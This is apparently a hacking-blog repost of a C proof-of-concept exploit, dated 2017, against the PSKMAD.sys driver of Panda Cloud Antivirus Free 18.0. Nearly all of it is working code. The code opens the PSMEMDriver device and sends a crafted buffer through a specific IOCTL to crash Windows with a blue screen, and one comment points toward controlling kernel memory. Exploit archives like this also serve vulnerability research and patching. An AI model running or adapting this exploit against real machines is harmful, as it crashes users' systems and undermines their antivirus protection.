Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863557536

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>


#define DEVICE_NAME L"\\\\.\\PSMEMDriver"

LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
	HANDLE hFile = NULL;

	hFile = CreateFile(FileName,
		GENERIC_READ | GENERIC_WRITE,
		0,
		0,
		OPEN_EXISTING,
		NULL,
		0);

	return hFile;
}

int main()
{

	HANDLE hFile = NULL;
	PVOID64 lpInBuffer = NULL;
	ULONG64 lpBytesReturned;
	PVOID64 BuffAddress = NULL;
	SIZE_T BufferSize = 0x800;
	
	printf("Trying the get the handle for the PSMEMDriver device.\r\n");
	
	hFile = GetDeviceHandle(FileName);

	if (hFile == INVALID_HANDLE_VALUE) {
		printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
		return 1;
	}

	// Allocate memory for our buffer
	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	

	if (lpInBuffer == NULL) {
		printf("VirtualAlloc() failed. \r\n");
		return 1;
	}
	

	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
	*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
	*(PULONG64)BuffAddress = (ULONG64)0x42424242;
	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
	
	RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);



		DeviceIoControl(hFile,
			0xb3702c38,
			lpInBuffer,
			NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
			NULL,
			NULL,
			&lpBytesReturned,
			NULL);

	/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
	printf("Cleaning up.\r\n");
	VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
	CloseHandle(hFile);
	printf("Resources freed up.\r\n");
    return 0;
}